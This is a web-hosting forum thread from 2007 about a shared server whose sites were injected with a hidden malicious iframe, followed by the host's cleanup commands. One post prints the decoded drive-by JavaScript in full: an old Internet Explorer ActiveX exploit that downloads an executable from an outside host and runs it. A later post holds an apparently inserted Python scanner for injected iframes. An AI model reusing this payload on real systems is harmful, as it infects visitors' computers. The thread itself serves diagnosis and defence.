  UK Web Hosting | Dedicated Server Windows and Linux VPS Forum > Web Hosting and Domains > Web Hosting Forum

#1
03-01-2007, 17:13
thecheekymonkey
Member
web hosting account infected with some sort of malware / virus!!!!!!!!!!

OK, a few people have mailed me now with regards to my website.

www.consoleworkshop.co.uk

(only click if you have firewall / antivirus installed)

Basically, as soon as you click on my website, my AVG goes crazy saying that it's found a threat (mo.com).

I'll click heal and it will continuously try to download it again and again.

No, it ain't my PC, as I've just freshly formatted it.
It isn't the antivirus software, as I've tried:
AVG Internet Security
AVG Page Ranking
ZoneAlarm
Norton Internet Security
Panda

All the same, it's either a threat or an unknown virus.

Searching the web has given me little info.

However, I did find this post on a forum:

www.pcadvisor.co.uk/forums/index.cfm?action=showthread&threadid=267579&forumid=13

They seem to think it's to do with the host.

This is driving me crazy now, so can anyone help?
__________________
www.consoleworkshop.co.uk
#2
03-01-2007, 18:17
daledavies
Premium Member

Your website seems to work fine at my end; I use McAfee and it's fully updated.
#3
03-01-2007, 18:38
DavidAllen
Premium Member

Your website is infected.
Have a look at the source of your index.htm page;
you will see a hidden iframe pointing to mortimercomprehensive.
That is causing the problem - it is trying to d/load malware.
See my thread in the resellers support forum, Malware Links on Server.
ALL accounts on that server have been compromised in a similar way. EUK have partially solved the problem - but are taking a very relaxed attitude to fixing it properly. My opinion of them is descending rapidly.
Regards
David
#4
03-01-2007, 19:55
eUKhost.com
Chief Marketing Officer

Hello Kieron,

What David has mentioned about the injection is right, but the problem is sorted now. There was no way to replace the iframe code completely, but we managed to modify the injected code to make it a 404 iframe. A 404 iframe won't load, and that way it won't cause any problems.

The following commands were run successfully to modify the injected code:

replace "mortimercomprehensive" "google" -- /home/username/public_html/index.*

&

replace "mortimercomprehensive" "google" -- /home/username/public_html/*/index.*

I won't agree with the other thing mentioned by David. I can provide you with the logs of kernel upgrades attempted in the last 3 months, and a similar thing never happened in the past. We are proud of the knowledge of our system admins, but it didn't work for jaguar.eukhost.com.

We paid other well-known system admins as well, but they had no success. Finally things got sorted on 26th Dec 2006, but some websites were still having the injection which didn't get replaced.

I can assure you that a similar thing won't happen on jaguar.eukhost.com again for at least the next 1 year, as the kernel is good for the next 1 year, but we will have the same problem again after 1 year. I'll ensure that we get the hardware replaced after 1 year because we cannot afford to go through the same trauma once again.

To Mr. David: Things always look good from the other end, but the one who has to go through it knows the pain involved.
__________________
UK Web Hosting || Business Hosting || eUKhost Knowledgebase
Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our Affiliate Program for FREE and earn 20% commission on each referral.
#5
03-01-2007, 20:47
DavidAllen
Premium Member
At last

At last EUK appear to have fixed the problem - it's only taken 3 weeks to run that replace command properly!!

The reason you noticed 'mo.com' is because the link d/loads a file and calls it mo.com, which it then tries to run.

If you follow the iframe links you'll find it leads to some encrypted code which translates as below:
Code:
<html>
<head>
<script type="text/javascript" language="javascript">
var i = 0;
var t = new Array(
'BD96C556-65A3-11D0-983A-00C04FC29E36',
'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
'0006F033-0000-0000-C000-000000000046',
'0006F03A-0000-0000-C000-000000000046',
'6E32070A-766D-4EE6-879C-DC1FA91D2FC3',
'6414512B-B978-451D-A0D8-FCFDF33E833C',
'7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
'06723E09-F4C2-43c8-8358-09FCD1DB0766',
'639F725F-1B2D-4831-A9FD-874847682010',
'BA018599-1DB3-44f9-83B4-461454C84BF8',
'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
'E8CCCDDF-CA28-496b-B050-6C07C962476B'
);

function fgr() {
return true;
}
window.onerror = fgr;

function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
}

function DoIt()
{
x.Open('GET','hxxp://mortimercomprehensive.co.uk/images/opennight/thumbs/tmp1/ld.exe',false);
x.Send();
var fname1 = 'mo.com';
var f = CreateO(xml,'Scripting.FileSystemObject');
var tmp = f.GetSpecialFolder(2);
fname1 = f.BuildPath(tmp,fname1);
S.open();
S.write(x.responseBody);
S.savetofile(fname1,2);
S.close();
var Q = CreateO(xml,'Shell.Application');
Q.ShellExecute(fname1,'','','open',0);
}

</script>
</head>
<body>
<script type="text/javascript" language="JavaScript">
if (navigator.userAgent.indexOf('MSIE') != -1) {
while (t[i]) {

var xml = null;

xml = document.createElement('object');
xml.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
n_xml = 'Microsoft.XMLHTTP';
var x = xml.CreateObject(n_xml,"");
a1 = 'ADO';
a2 = 'DB.';
a3 = 'Str';
a4 = 'eam';
str1 = a1 + a2 + a3 + a4;
str5 = str1;
if (xml) {
var S = CreateO(xml,str5);
if (S) {
S.type = 1;
str6 = 'GET';
DoIt();
}
}
}
}
</script>
</body>
</html>

#6
03-01-2007, 20:58
eUKhost.com
Chief Marketing Officer

It won't happen now, as it will give a 404 iframe URL, which won't make any difference.

Not sure why support people were not able to run the replace command for internal subdirectories of accounts, but this should be sufficient for me to forward to our CTO.
#7
03-01-2007, 22:45
DavidAllen
Premium Member

You might also want to run the replace on index*.*, as one of my websites had a file indexesp.htm infected.
#8
03-01-2007, 23:03
eUKhost.com
Chief Marketing Officer

I did that, but it found only one file (indexold.htm) inside one public_html of a customer. The command could penetrate to one more directory only, so anything that's 2 directories inside cannot be reached (e.g. public_html/subdirectory/otherdirectory/indexesp.htm).
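The one-level reach discussed in the last few posts is a limit of the globs (`public_html/index.*` and `public_html/*/index.*`), not of where an injected page can live: as the indexesp.htm case shows, it can sit at any depth and under any name. The script below is an added example, not from the thread or eUKhost, of a read-only scan that walks the whole web root and reports every iframe that either points at a listed host or is rendered invisible (zero size or CSS-hidden), so a fix can be applied to the complete list; the sample tree it builds, the maps.example.com embed and the file contents are constructed, while mortimercomprehensive.co.uk is the host named in the thread.

```python
import os
import re
import tempfile

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(  # zero size or CSS hiding: a frame the visitor cannot see
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE)
HTML_EXTS = {".htm", ".html", ".shtml", ".php"}

def host_of(url):
    """Host part of a URL, lower-cased, without scheme or path."""
    return re.sub(r"^[a-z]+://", "", url, flags=re.IGNORECASE).split("/")[0].lower()

def find_injected_iframes(root, bad_hosts):
    """Sorted (relative path, src) pairs for every <iframe> at any depth under
    root whose src host is in bad_hosts or whose tag is rendered invisible."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in HTML_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for tag in IFRAME_RE.findall(text):
                m = SRC_RE.search(tag)
                src = m.group(1) if m else ""
                if host_of(src) in bad_hosts or HIDDEN_RE.search(tag):
                    hits.append((os.path.relpath(path, root).replace(os.sep, "/"), src))
    return sorted(hits)

def build_sample_tree():
    """Constructed web root: an infected index.htm, an infected page two directories
    down (the case the one-level replace missed) and a clean page with a visible embed."""
    root = tempfile.mkdtemp(prefix="public_html_")
    bad = ('<iframe src="http://mortimercomprehensive.co.uk/x.htm" '
           'width="0" height="0" frameborder="0"></iframe>')
    ok = '<iframe src="https://maps.example.com/e" width="400" height="300"></iframe>'
    pages = {"index.htm": "<html><body>Shop</body>" + bad + "</html>",
             "sub/deep/indexesp.htm": "<html><body>ES</body>" + bad + "</html>",
             "about.html": "<p>Map</p>" + ok}
    for rel, body in pages.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Pointing `find_injected_iframes` at a real account's public_html instead of the constructed tree lists every affected file, including those the depth-limited globs never reached.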
#9
05-01-2007, 20:04
Member

Mark - it seems as though server 64.38.20.134 may be infected as well.

There is an iframe with a strange link on the index.htm of aruncontrolsystems.co.uk.

Please advise! I will raise a ticket!
#10
05-01-2007, 22:16
eUKhost.com
Chief Marketing Officer

Both servers had the same configuration and both were set up at the same time. We managed to upgrade the kernel on both on the same day in December 2006.

I've executed the replace command, which has sorted this iframe injection.
Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
LinkBacks Enabled by Web Hosting 3.1.0
Copyright © 2001-2008, eUKhost.com. All rights reserved.

 